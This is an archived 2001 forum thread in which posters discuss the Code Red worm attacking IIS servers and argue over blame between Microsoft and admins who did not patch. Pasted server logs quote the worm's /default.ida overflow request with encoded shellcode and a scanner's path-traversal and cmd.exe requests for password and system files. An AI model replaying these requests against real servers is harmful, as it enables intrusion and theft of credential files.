July 19, 2001
3:57 PM Subscribe
posted by schampeo at 4:08 PM on July 19, 2001
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a
not this
posted by machaus at 4:21 PM on July 19, 2001
posted by bizwank at 4:24 PM on July 19, 2001
We were tooling around with the damn server trying to solve what was wrong. Went to windows update and their security update fixed the issue.
And I was just cursing the fact that it was a IIS server as well. This is my first week at my new job and was hoping they would be running Apache, thankfully some of the systems here are Apache and *nix based.
Microsoft strikes again.
posted by physics at 4:50 PM on July 19, 2001
posted by jjg at 5:02 PM on July 19, 2001
Anyone know what that's all about? It's just been happening this week, never before.
posted by Succa at 5:53 PM on July 19, 2001
I'm not clear on these kinds of attacks, though. The IP addresses that show up on my logs are IP addresses of infected hosts who are trying to infect the machine my site is on?
posted by idiolect at 6:04 PM on July 19, 2001
I've been getting very odd referrals lately. Sites that in no way link to mine
IE bug, I'm told. the person has your window open and that other window open.
I'm sometimes appalled at what people read concurrent with the pocket....
posted by rebeccablood at 6:06 PM on July 19, 2001
That said, I'm running Apache as well.
posted by mike at 6:11 PM on July 19, 2001
posted by machaus at 6:11 PM on July 19, 2001
Now that would be funny...
Hey, anyone else get the symbolic irony of a bunch of Windows servers attacking whitehouse.gov??
posted by fooljay at 6:18 PM on July 19, 2001
posted by greyscale at 6:43 PM on July 19, 2001
Nice to know exactly what's going on though, even if it's only going on to other people! :-)
posted by benzo8 at 7:41 PM on July 19, 2001
SEE! Another reason not to EVER hardcode ip addresses...
posted by smackfu at 8:10 PM on July 19, 2001
And greyscale, what do you mean "making an association"? The worm itself claims to be from China. Basically, it was (or was meant to look like it was) made by a Chinese hacker who doesn't like the US government all that much.
posted by whatnotever at 9:09 PM on July 19, 2001
posted by jasonshellen at 9:49 PM on July 19, 2001
[15:51:52 +1000] "HEAD / HTTP/1.0"
[16:01:54 +1000] "GET /."./."./winnt/win.ini .php3 HTTP/1.0"
[16:01:55 +1000] "GET /....../autoexec.bat HTTP/1.0"
[16:01:56 +1000] "GET /..../config.sys HTTP/1.0"
[16:01:57 +1000] "GET /../../../../../../Scandisk.log HTTP/1.0"
[16:01:57 +1000] "GET /../../../../../winnt/repair/sam._ HTTP/1.0"
[16:01:58 +1000] "GET /../../../../config.sys HTTP/1.0"
[16:01:59 +1000] "GET /../../../autoexec.bat HTTP/1.0"
[16:02:00 +1000] "GET /../../../scandisk.log HTTP/1.0"
[16:02:01 +1000] "GET /../../windows/user.dat HTTP/1.0"
[16:02:02 +1000] "GET /..\..\..\winnt\repair\sam._ HTTP/1.0"
[16:02:02 +1000] "GET /..\\..\\..\\..\\..\\..\autoexec.bat HTTP/1.0"
[16:02:03 +1000] "GET /..\\..\\..\winnt\repair\sam._ HTTP/1.0"
[16:02:04 +1000] "GET /.nsf/../winnt/win.ini HTTP/1.0"
[16:02:08 +1000] "GET /_private/shopping_cart.mdb HTTP/1.0"
[16:02:08 +1000] "GET /_vti_bin/_vti_aut/dvwssr.dll HTTP/1.0"
[16:02:09 +1000] "GET /_vti_bin/fpcount.exe?Page=default.htm|Image=2|Digits=1 HTTP/1.0"
[16:02:10 +1000] "GET /_vti_bin/shtml.dll HTTP/1.0"
[16:02:14 +1000] "GET /_vti_bin/shtml.dll/nosuch.htm HTTP/1.0"
[16:02:15 +1000] "GET /_vti_bin/shtml.exe HTTP/1.0"
[16:02:15 +1000] "GET /_vti_inf.html HTTP/1.0" 0.013
[16:02:16 +1000] "GET /_vti_pvt/administrators.pwd HTTP/1.0"
[16:02:19 +1000] "GET /_vti_pvt/shtml.exe HTTP/1.0"
[16:05:17 +1000] "GET /cgi-bin/build.cgi HTTP/1.0"
[16:05:17 +1000] "GET /cgi-bin/cached_feed.cgi HTTP/1.0"
[16:05:18 +1000] "GET /cgi-bin/cachemgr.cgi HTTP/1.0"
[16:05:19 +1000] "GET /cgi-bin/cal_make.pl HTTP/1.0"
[16:05:20 +1000] "GET /cgi-bin/calender.pl HTTP/1.0"
[16:05:26 +1000] "GET /cgi-bin/cgiforum.pl HTTP/1.0"
[16:05:27 +1000] "GET /cgi-bin/cgiwrap HTTP/1.0"
[16:05:28 +1000] "GET /cgi-bin/changepw.cgi HTTP/1.0"
[16:05:29 +1000] "GET /cgi-bin/classifieds.cgi HTTP/1.0"
[16:07:27 +1000] "GET /customer/ HTTP/1.0"
[16:07:31 +1000] "GET /data/ HTTP/1.0"
[16:07:32 +1000] "GET /database/ HTTP/1.0"
[16:07:33 +1000] "GET /databases/ HTTP/1.0"
[16:07:33 +1000] "GET /db/ HTTP/1.0"
[16:07:34 +1000] "GET /dbase/ HTTP/1.0"
[16:07:54 +1000] "GET /girl/ HTTP/1.0"
[16:07:58 +1000] "GET /girls/ HTTP/1.0"
[16:07:59 +1000] "GET /hire/ HTTP/1.0"
[16:08:00 +1000] "GET /htdocs/ HTTP/1.0"
[16:08:01 +1000] "GET /html/snort2html.html HTTP/1.0"
[16:08:02 +1000] "GET /idea/ HTTP/1.0"
[16:08:03 +1000] "GET /ideas/ HTTP/1.0"
[16:08:07 +1000] "GET /image/ HTTP/1.0"
[16:08:07 +1000] "GET /images/ HTTP/1.0"
[16:09:16 +1000] "GET /phpgroupware/inc/phpgwapi/phpgw.inc.php HTTP/1.0"
[16:09:17 +1000] "GET /phpPhotoAlbum/explorer.php HTTP/1.0"
[16:09:18 +1000] "GET /piranha/secure/passwd.php3 HTTP/1.0"
[16:09:19 +1000] "GET /porno/ HTTP/1.0"
[16:09:20 +1000] "GET /ports/ HTTP/1.0"
[16:09:24 +1000] "GET /private/ HTTP/1.0"
[16:09:25 +1000] "GET /private/.htpasswd HTTP/1.0"
[16:09:25 +1000] "GET /program/ HTTP/1.0"
[16:09:26 +1000] "GET /programming/ HTTP/1.0"
[16:09:43 +1000] "GET /secret/ HTTP/1.0"
[16:09:44 +1000] "GET /secret/secret/add-user.shmtl HTTP/1.0"
[16:09:47 +1000] "GET /secret/secret/change-passwd.shtml HTTP/1.0"
[16:09:48 +1000] "GET /secret/secret/sql_tool.shtml HTTP/1.0"
[16:09:58 +1000] "GET /sex/ HTTP/1.0"
[16:13:45 +1000] "GET /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe?/c+dir HTTP/1.0"
[16:13:46 +1000] "GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+dir HTTP/1.0"
[16:13:47 +1000] "GET /null.ida HTTP/1.0"
[16:13:48 +1000] "GET /null.idq HTTP/1.0"
[16:13:48 +1000] "GET /NULL.printer HTTP/1.0" http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
...etc, etc
677 lines in total, all coming from a server with an IP address somewhere in China.
posted by ZippityBuddha at 10:16 PM on July 19, 2001
I can imagine somebody sitting down one day, writing a leet script, thinking, "If the server is secure... heck, it just might have free porn!"
posted by whatnotever at 11:59 PM on July 19, 2001
The worm uses vulnerabilities in Solaris to do most fo the work, and people will only talk about how IIS is the problem?
Of course, this only happens to you if you didn;t patch a KNOWN security problem that has had a patch out for more than a month.
Yeah, keep blaming MS.
posted by soulhuntre at 12:14 AM on July 20, 2001
posted by whatnotever at 12:32 AM on July 20, 2001
posted by alana at 12:38 AM on July 20, 2001
Uhhhh, yeah. Could you explain how a vulnerability in Solaris is causing a buffer overflow on Microsoft Internet Information Servers (IIS)?? Maybe I'm missing something...
Of course, this only happens to you if you didn;t patch a KNOWN security problem that has had a patch out for more than a month.
Yeah, keep blaming MS.
True. It is an old patch (in internet time anyway), but if it weren't for the constantly buggy and insecure IIS, would this be an issue? Microsoft software is generally, and has always been, insecure for a reason, and it's not because they are incompetent...
posted by fooljay at 12:39 AM on July 20, 2001
posted by alana at 1:16 AM on July 20, 2001
posted by samsara at 7:17 AM on July 20, 2001
I'll stop blaming MS when they stop coming out with patches for the various vulnerabilities that crop up on a daily basis. Continual patches are not indicative of a complete, secure, finished product, but that gets into the whole other discussion of buggy software. Can you tell I'm still bitter about TPTB switching from a Unix server to NT five years ago?
posted by evixir at 8:31 AM on July 20, 2001
"Honest, non snarky question . . . what does Solaris have to do with this?"
There is a worm that actually spreads mostly on Solaris (unixish) and uses those platforms to attack IIS servers.
Let's be honest. IIS/Windows is THE target environment. It has a huge bullseye painted on it and every two bit hacker with dreams of glory wants to take a run at it.
It does a great job, but you simply must stay updated.
Anyone who claims that it isn't the job of the admin to keep up with updates/patches is just not thinking this through.
What is most upsetting is the hypocrasy. Linux root exploits pop up all the time, and there isn't this kind of uproar - all you'll see is folks saying "dammit, if you can't stay current then your to blame".
And it's true.
A little intellectual honesty and consistency should not be too much to ask.
But all that goes by the wayside for a chance to take a shot at MS... it would be sad if it wasn't so funny.
posted by soulhuntre at 10:18 AM on July 20, 2001
What we may be seeing here is not so much the flawedness of MS software, which does exist, but the attraction to hacking it in particular. Both because of market size and hacker dislike of MS and its success, MS software is often targeted for greater inspection than most software gets, which may be why so many holes are both found and then heavily publicized (these same folks aren't up late at nights finding ways to humiliatingly find holes in Linux, because that would disturb their precious pipedream about free software...). It's not dissimilar to the way that the most publicized diseases get the most funding and research. Doesn't mean the disease is an easy one to cure, or was the most dangerous or life-threatening, but rather that the "squeaky wheel gets the grease".
posted by hincandenza at 10:28 AM on July 20, 2001
As for getting my router updated, there's no way to get the update from Cisco as they do not allow direct updates, and my internet provider, Conectiv, can't support the new version because their equipment doesn't like how the new version works with NAT. It's the whole industry I tell ya...sheesh!
posted by samsara at 10:55 AM on July 20, 2001
posted by vanderwal at 11:20 AM on July 20, 2001
Gawd, I don't think anyone is claiming that. But both Unix and Windows admins know who has the most exploits (which has to do with shipping the most buggy insecure software. Hint: It's not Unix). So the primary blame lies with the software maker. The secondary blame lies with the admins who refuse, are to lazy to, or don't know how to patch systems and do security audits.
What is most upsetting is the hypocrasy. Linux root exploits pop up all the time, and there isn't this kind of uproar
There are a few reasons for that, but mostly it comes down to, in my experience anyway, by and large, Unix boxes are tended to better than Windows boxes. Microsoft makes it easy for anyone to set up a server. If we only gave driver's licenses to professional race car drivers there would be a lot fewer accidents even though the speed limit would be 125MPH. Unix relative difficulty creates a hurdle for incompetence. That's not to say there are no incompetent Unix admins, there are just fewer of them percentage-wise.
What we may be seeing here is not so much the flawedness of MS software, which does exist, but the attraction to hacking it in particular. Both because of market size and hacker dislike of MS and its success, MS software is often targeted
I'll give you that second part. For sure, Microsoft makes its own bed. As far as the market share, that holds true for client software but not server software. The (second) problem is that many Windows servers aren't mission critical, so they don't have the level of auditing and security one would have on most Unix servers hooked to the Net.
heavily publicized
While Microsoft bugs are certainly talked about more in the media, it is typically because they affect client software and hence are more newsworthy for the masses. Surely, though, there is a bit of media momentum there as well...
I have been watching CERT et al for about 4 years and can tell you that there actually are more Microsoft bugs than any other individual platform. In this instance, you can't just say Microsoft vs Unix because Unix contains a whole host of individually developed OS's.
posted by fooljay at 11:59 AM on July 20, 2001
posted by fooljay at 12:00 PM on July 20, 2001
« Older The Ugly American | Want to Live Rent Free? Get sick. Newer »
This thread has been archived and is closed to new comments
posted by waxpancake at 4:01 PM on July 19, 2001